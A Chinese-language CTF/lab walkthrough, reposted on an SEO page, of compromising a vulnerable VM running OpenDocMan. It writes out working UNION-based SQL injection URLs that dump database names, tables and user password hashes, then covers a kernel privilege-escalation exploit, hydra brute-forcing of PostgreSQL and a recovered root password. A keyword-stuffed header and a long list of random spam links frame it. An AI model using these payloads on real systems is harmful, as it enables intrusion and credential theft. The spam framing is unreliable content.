当前位置: 首页 > wzjs >正文

安阳网站建设公司出租车公司去掉wordpress

安阳网站建设公司出租车公司,去掉wordpress,如何找工程项目信息,python做网站框架春秋蝉鸣少年归~ arp发现靶机ip地址 发现开放80端口那先去访问一下 问题不大,没有什么有用的提示那就上dirb跑一下 这里给了一个版本号 通过searchsploit搜索了一下没有这个版本的poc/exp去网上搜搜看 这个也试了一下也利用不了回到页面上发现有个website可以点 然后…

春秋蝉鸣少年归~


arp发现靶机ip地址

发现开放80端口那先去访问一下

问题不大,没有什么有用的提示那就上dirb跑一下

这里给了一个版本号

通过searchsploit搜索了一下没有这个版本的poc/exp去网上搜搜看

这个也试了一下也利用不了回到页面上发现有个website可以点

然后我们会来到一个新的网站

最终在每个页面都看了一下,发现这个页面的鼠标放上去鼠标会变,这里也是给了账号密码

通过提示我们用给的用户名和密码去访问一下

来到这个地方我们发现一个大大的logo就是这个opendocman,还是老样子去searchsploit搜索一下刚好有一个符合的

拿到当前目录下好好看看

这个意思是有两个漏洞可以用一个sql注入一个权限提升的

尝试利用
http://192.168.52.151/jabcd0cs/ajax_udf.php?q=1&add_value=odm_user%20UNION%20SELECT%201,version(),3,4,5,6,7,8,9

爆破库名
192.168.52.151/jabcd0cs/ajax_udf.php?q=1&add_value=odm_user  UNION SELECT 1,group_concat(schema_name),3,4,5,6,7,8,9 from information_schema.schemata

爆表
http://192.168.52.151/jabcd0cs/ajax_udf.php?q=1&add_value=odm_user%20UNION%20SELECT%201,group_concat(table_name),3,4,5,6,7,8,9%20from%20information_schema.tables%20where%20table_schema=database()

字段
192.168.52.151/jabcd0cs/ajax_udf.php?q=1&add_value=odm_user UNION SELECT 1,group_concat(column_name),3,4,5,6,7,8,9 from information_schema.columns where table_schema=database()

查表
http://192.168.52.151/jabcd0cs/ajax_udf.php?q=1&add_value=odm_user%20UNION%20SELECT%201,group_concat(column_name),3,4,5,6,7,8,9%20from%20information_schema.columns%20where%20table_schema=database()%20and%20table_name=0x6f646d5f75736572
佬说这里有一个注意点,就是用字符串表名来查表的时候查不出来,需要把表的字符串换成16进制0x6f646d5f75736572

查密码
http://192.168.52.151/jabcd0cs/ajax_udf.php?q=1&add_value=odm_user UNION SELECT 1,group_concat(username,password),3,4,5,6,7,8,9 from odm_user

给了两个密码咱们都试试

ssh直接连

进来先用python获取一个交互式shell,可以看到内核是一个低版本的去search一下

有两个符合先试试.c

将.c文件wget到tmp目录下,看看.c怎么执行的,编译后./ofs执行提权脚本,成功获取权限

第二种方式 解压目录下的文件夹,hydra

./confingure好了之后告诉我们make

安装成功

ps -aux时发现postgres进行信息,还有hydra尝试进行一下爆破

来到usr/share/wordlists/metasploit目录下面有postgres的默认密码和用户的密码本这样结合hydra爆破一下

./hydra -L user.txt -P passwd.txt localhost postgres

登录postgres psql -h localhost -U postgres

查看database

\c 进入到这个system

SLECT * FROM users;

su切换到vulnosadmin 查看有一个r00t.blend 通过cp挂在html目录下

wget下载r00t.blend

来到这个https://imagetostl.com/cn/view-blend-online网站下点击上传就可以看到,然后用密码登录root即可ab12fg//drg


文章转载自:

http://XN7N8RNI.rpwht.cn
http://jHHUMlXD.rpwht.cn
http://Pm3mNXMR.rpwht.cn
http://WKhItGtv.rpwht.cn
http://u5hWZ66L.rpwht.cn
http://CLBxGlZI.rpwht.cn
http://VLkZmqpa.rpwht.cn
http://KP1yyXjJ.rpwht.cn
http://jrVicTSV.rpwht.cn
http://G7J8bcF7.rpwht.cn
http://XnUxrcW0.rpwht.cn
http://vnMNcAJH.rpwht.cn
http://U6XsLzIn.rpwht.cn
http://o3bjLCIX.rpwht.cn
http://XJ21bDy6.rpwht.cn
http://OKWgni7S.rpwht.cn
http://2Jh9ARVk.rpwht.cn
http://PcFU84Oz.rpwht.cn
http://ZWRyp8s7.rpwht.cn
http://l6tKsyR7.rpwht.cn
http://LXNErjmR.rpwht.cn
http://sPy3FJ8k.rpwht.cn
http://AL6GHwHC.rpwht.cn
http://W6r8G1JC.rpwht.cn
http://YlMRJPu6.rpwht.cn
http://yDkOkvxI.rpwht.cn
http://W7Ms2NqH.rpwht.cn
http://W9imE21m.rpwht.cn
http://Z3QvKiIl.rpwht.cn
http://lqIxLuld.rpwht.cn
http://www.dtcms.com/wzjs/705071.html

相关文章:

  • 网站建设 天津辽宁省城乡建设厅网站
  • 做文案策划需要看什么网站wordpress 苏醒主题
  • 平顶山建设公司网站怎么看网站的建站公司是哪个
  • 大凤号 网站建设wordpress设计导航
  • 深圳做网站得外包公司有哪些软件设计方案怎么写
  • 简单旅游网站模板下载什么插件可以做网站访问量统计
  • 中小企业网站功能模块及数据库表wordpress如何做导航网站
  • 网站建设界面建议中国建设银行网站保定五四路
  • 手机好看网站模板免费下载东莞住房建设网站的网
  • 运城建设银行网站莱芜都市网最新招聘信息
  • 南阳网站排名优化报价网络科技公司名称大全简单大气
  • 如何制作一个注册网站长沙网络营销公司哪家好
  • 你好南京网站网站建设公司-山而
  • 知名网站建设多少钱婚恋网站建设项目创业计划书
  • 做机械设备哪个网站好经营网站备案信息
  • 镇江网站建设一般多少钱建站需要会哪些语言
  • 开发网站要注意什么自动发货 wordpress
  • 赤峰是住房和城乡建设局网站网站关键词结构
  • 建设网站需要什么证件网站首页设计制作费用
  • 门户网站如何运营台州关键词优化推荐
  • 网站开发的报价虚拟网站php专业型
  • wordpress md风格主题科学新概念seo外链平台
  • 自己做视频网站有点卡如何搭wordpress
  • .net网站空间水产养殖畜禽饲料类网站前端模板
  • 做网站开发要注册用户体验设计师是干嘛
  • 网站做404好处网站建设流程分几步
  • 学做网站 软件下面什么不是用于制作网页的软件
  • 宁夏网站设计在哪里建设一下网站要求提供源码
  • 扁平式网站源码网址升级中
  • 如何给自己网站做网站优化wordpress 图库